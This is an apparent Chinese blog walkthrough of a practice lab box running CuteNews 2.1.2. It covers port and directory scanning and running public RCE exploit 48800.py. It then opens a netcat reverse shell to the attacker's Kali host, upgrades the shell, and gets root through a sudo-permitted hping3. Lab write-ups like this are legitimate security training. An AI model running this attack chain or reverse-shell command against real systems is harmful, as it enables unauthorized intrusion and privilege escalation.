靶场练习(1):CuteNews

靶机ip:172.16.33.9

突破

端口扫描

sudo nmap -p- 172.16.33.9 --open

结果如下:
在这里插入图片描述

特定端口扫描

sudo nmap -p22,80,88,110,995 -sV -A 172.16.33.9

结果如下:
在这里插入图片描述

针对80端口

对其进行路径扫描:

dirsearch -u http://172.16.33.9

对其进行文件扫描:

dirsearch -u http://172.16.33.9 -f -e txt,php,html.pdf

结果如下:
在这里插入图片描述
挨个进入尝试,最终在http://172.16.33.9/index.php页面发现管理系统名称及其版本号:cutenews2.1.2

在这里插入图片描述
运用searchsploit工具查询其是否有漏洞:

searchsploit cutenews

结果如下:
在这里插入图片描述
发现48800.py,其运用了远程代码执行漏洞,下载:

searchsploit -m 48800

查看代码,将其中的所有url部分改成实际情况,例如:

f"{ip}/index.php?mod=main&opt=personal"

结果如下:
在这里插入图片描述
按照代码中的提示运行脚本,突破成功:

python3 48800.py

按照提示输入URL :

Enter the URL> http://172.16.33.9 

查看id,发现已进入指令模式:

id

结果如下:
在这里插入图片描述
通过netcat连接自身kali端主机:

nc <kali端本地ip> 1234 -e /bin/bash

做好侦听:

nc -nvlp 1234

结果如下:
在这里插入图片描述

提权

升级终端

python3 -c 'import pty;pty.spawn("/bin/bash")'

或者

/usr/bin/script -qc /bin/bash /dev/null

通过sudo -l进行提权

查看当前用户能使用root权限运行哪些指令:

sudo -l

结果如下:

在这里插入图片描述

通过hping3进行提权:

hping3

查看id:

id

结果如下:
在这里插入图片描述
提权成功,打靶完成。

  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值